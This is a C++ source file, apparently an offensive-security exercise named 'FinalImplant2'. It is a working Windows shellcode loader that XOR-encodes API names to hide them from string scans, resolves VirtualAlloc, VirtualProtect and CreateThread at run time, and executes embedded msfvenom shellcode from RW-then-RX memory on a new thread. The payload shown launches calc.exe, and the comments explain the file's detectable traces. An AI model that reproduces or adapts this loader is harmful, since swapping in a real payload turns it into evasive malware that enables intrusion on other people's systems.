FinalImplant2.cpp
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
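/*
 * XOR(): XOR `data` in place with a repeating key.
 *
 * key_len is the allocated size of the key buffer *including* its trailing
 * NUL (the callers in this file pass sizeof(key) for a string literal), so the
 * effective key period is key_len - 1 and the terminator is never mixed in.
 * Applying the function twice with the same key restores the original bytes,
 * which is how the callers decode the API-name arrays below.
 *
 * data      buffer transformed in place
 * data_len  number of bytes of `data` to transform
 * key       key bytes; key[key_len - 1] is treated as the NUL terminator
 * key_len   size of the key buffer including the terminator; must be >= 2
 *
 * Degenerate inputs (NULL pointers, key_len < 2) are a no-op. The previous
 * loop reset its index only when it *equalled* key_len - 1, so for key_len of
 * 0 or 1 it read past the end of `key` on the second byte.
 *
 * Security note: a fixed, repeating XOR key is obfuscation, not encryption.
 * In this file the key is a cleartext literal stored next to the encoded
 * bytes, so this only defeats a naive string scan of the file on disk; anyone
 * holding the binary recovers the names by running the same loop.
 */
void XOR(char *data, size_t data_len, const char *key, size_t key_len) {
    if (data == NULL || key == NULL || key_len < 2) {
        return;
    }
    const size_t period = key_len - 1; /* exclude the key's NUL terminator */
    for (size_t i = 0; i < data_len; i++) {
        data[i] ^= key[i % period];
    }
}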
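/*
 * Program entry point.
 *
 * Resolves VirtualAlloc, VirtualProtect and CreateThread from kernel32 and
 * RtlMoveMemory from ntdll via GetProcAddress, using API names that are stored
 * XOR-encoded and decoded on the stack immediately before the lookup. It then
 * stages the msfvenom `windows/x64/exec CMD=calc.exe` payload: allocate RW,
 * copy, flip the page to RX, run it on a new thread and wait for the thread.
 *
 * Returns 0 when the payload thread ran to completion, 1 when any module/API
 * lookup, allocation, protection change or thread creation fails. Every Win32
 * result is checked; the earlier version ignored them and would have passed
 * NULL into RtlMoveMemory / WaitForSingleObject on failure.
 *
 * NOTE(review) on what this hides and what it does not:
 *  - The XOR key is a cleartext literal next to the encoded bytes, so the
 *    import names are hidden from a naive `strings` pass over the file, not
 *    from anyone who has the binary.
 *  - GetModuleHandle, GetProcAddress, WaitForSingleObject and CloseHandle are
 *    still linked statically and remain in the import table.
 *  - At run time the decoded names and the payload sit in writable process
 *    memory, and the RW -> RX protection change followed by a thread started on
 *    non-image memory are the events a defender can observe here.
 */
int main(void) {
    /* Function-pointer types for the dynamically resolved APIs. */
    typedef LPVOID (WINAPI *VirtualAlloc_t)(LPVOID lpAddress, SIZE_T dwSize,
                                            DWORD flAllocationType, DWORD flProtect);
    typedef void (WINAPI *RtlMoveMemory_t)(LPVOID Destination, const void *Source,
                                           SIZE_T Length);
    typedef BOOL (WINAPI *VirtualProtect_t)(LPVOID lpAddress, SIZE_T dwSize,
                                            DWORD flNewProtect, PDWORD lpflOldProtect);
    typedef HANDLE (WINAPI *CreateThread_t)(LPSECURITY_ATTRIBUTES lpThreadAttributes,
                                            SIZE_T dwStackSize,
                                            LPTHREAD_START_ROUTINE lpStartAddress,
                                            LPVOID lpParameter, DWORD dwCreationFlags,
                                            LPDWORD lpThreadId);

    /* Both modules are expected to be mapped in any Win32 process; checking
     * anyway keeps a NULL module from turning into an opaque lookup failure. */
    HMODULE hKernel32 = GetModuleHandle("kernel32.dll");
    HMODULE hNtdll = GetModuleHandle("ntdll.dll");
    if (hKernel32 == NULL || hNtdll == NULL) {
        return 1;
    }

    /* API names XOR-encoded with `key` (see XOR()). Each array ends in 0x00
     * so the decoded buffer is a NUL-terminated string for GetProcAddress;
     * that terminator is excluded from the length handed to XOR(). */
    char key[] = "hellohackers";
    char sVirtualAlloc[]   = {0x3e,0x0c,0x1e,0x18,0x1a,0x09,0x0d,0x22,0x07,0x09,0x1d,0x10,0x00};
    char sRtlMoveMemory[]  = {0x3a,0x11,0x00,0x21,0x00,0x1e,0x04,0x2e,0x0e,0x08,0x1d,0x01,0x11,0x00};
    char sVirtualProtect[] = {0x3e,0x0c,0x1e,0x18,0x1a,0x09,0x0d,0x33,0x19,0x0a,0x06,0x16,0x0b,0x11,0x00};
    char sCreateThread[]   = {0x2b,0x17,0x09,0x0d,0x1b,0x0d,0x35,0x0b,0x19,0x00,0x13,0x17,0x00};
    XOR(sVirtualAlloc, sizeof(sVirtualAlloc) - 1, key, sizeof(key));
    XOR(sRtlMoveMemory, sizeof(sRtlMoveMemory) - 1, key, sizeof(key));
    XOR(sVirtualProtect, sizeof(sVirtualProtect) - 1, key, sizeof(key));
    XOR(sCreateThread, sizeof(sCreateThread) - 1, key, sizeof(key));

    /* Resolve the four APIs; a NULL here means a wrong key, a truncated name
     * array or a module without that export. */
    VirtualAlloc_t pVirtualAlloc = (VirtualAlloc_t)GetProcAddress(hKernel32, sVirtualAlloc);
    RtlMoveMemory_t pRtlMoveMemory = (RtlMoveMemory_t)GetProcAddress(hNtdll, sRtlMoveMemory);
    VirtualProtect_t pVirtualProtect = (VirtualProtect_t)GetProcAddress(hKernel32, sVirtualProtect);
    CreateThread_t pCreateThread = (CreateThread_t)GetProcAddress(hKernel32, sCreateThread);
    if (pVirtualAlloc == NULL || pRtlMoveMemory == NULL ||
        pVirtualProtect == NULL || pCreateThread == NULL) {
        return 1;
    }

    // msfvenom -p windows/x64/exec CMD=calc.exe -f C
    unsigned char payload[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
        "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
        "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
        "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
        "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
        "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
        "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
        "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
        "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
        "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
        "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
        "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
        "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
        "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
        "\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
        "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
        "\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
        "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
        "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
        "\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
    /* sizeof also counts the string literal's implicit trailing NUL, i.e. one
     * extra zero byte after the embedded "calc.exe\0"; it is copied along but
     * is not part of the shellcode. */
    SIZE_T payload_len = sizeof(payload);

    /* Stage through RW, then switch to RX, instead of requesting RWX up front. */
    void *exec_mem = pVirtualAlloc(NULL, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (exec_mem == NULL) {
        return 1;
    }
    pRtlMoveMemory(exec_mem, payload, payload_len);

    DWORD oldprotect = 0; /* output parameter; required by the API, unused after */
    if (!pVirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect)) {
        return 1;
    }

    /* Data pointer -> function pointer cast: the usual Win32 idiom for running
     * position-independent code, not portable C. */
    HANDLE th = pCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)exec_mem, NULL, 0, NULL);
    if (th == NULL) {
        return 1;
    }
    WaitForSingleObject(th, INFINITE); /* INFINITE is the (DWORD)-1 used before */
    CloseHandle(th);
    return 0;
}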